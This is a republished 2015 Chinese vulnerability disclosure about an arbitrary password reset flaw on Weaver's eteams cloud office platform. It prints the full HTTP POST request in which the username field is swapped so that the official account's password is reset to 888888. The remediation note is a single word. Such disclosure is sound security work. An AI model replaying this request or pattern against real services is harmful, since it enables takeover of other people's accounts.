记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

泛微旗下云办公平台任意密码重置漏洞(官方帐号为例)

2015-07-26 21:05

https://passport.eteams.cn/password

 

泛微0.png



重置密码功能,通过邮箱验证后,修改密码时

把username修改为任意邮箱即可被重置

以官网帐号[email protected]为例
 


POST /password/changePassword/emailway HTTP/1.1
Host: passport.eteams.cn
Connection: keep-alive
Content-Length: 124
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: https://passport.eteams.cn
User-Agent:
Content-Type: application/x-www-form-urlencoded
Referer: https://passport.eteams.cn/password/reset?key=YWtsZm9lb0AxNjMuY29tJkhyTWREMGo5a3ExVUw3cH00BGMnIrRHFlYmRvdGdJMFh1Y0NtcHJGeGFPYkdqcmRqU291STVqeVJ0TWc5SnU2ZWo
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: JSESSIONID=B721F50AF929763B14A4B8**D668D415; Hm_lvt_41555f1291b274a5e1d99199f20e9eab=1437620046,1437620193; Hm_lpvt_41555f1291b274a5e1d99199f20e9eab=1437620256

newPwd=888888&confirmPwd=888888&username=[email protected]&pwd=HrMdD0j9kq1UL7ppF2r%2BDqebdotgI0XucCmprFxaObGjrdjSouI5jyRtMg9Ju6ej

 

泛微1.png

 

泛微2.png

 

泛微3.png

 

泛微4.png

解决方案:

判断

知识来源: www.2cto.com/Article/201507/423665.html

阅读:89937 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“泛微旗下云办公平台任意密码重置漏洞(官方帐号为例)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云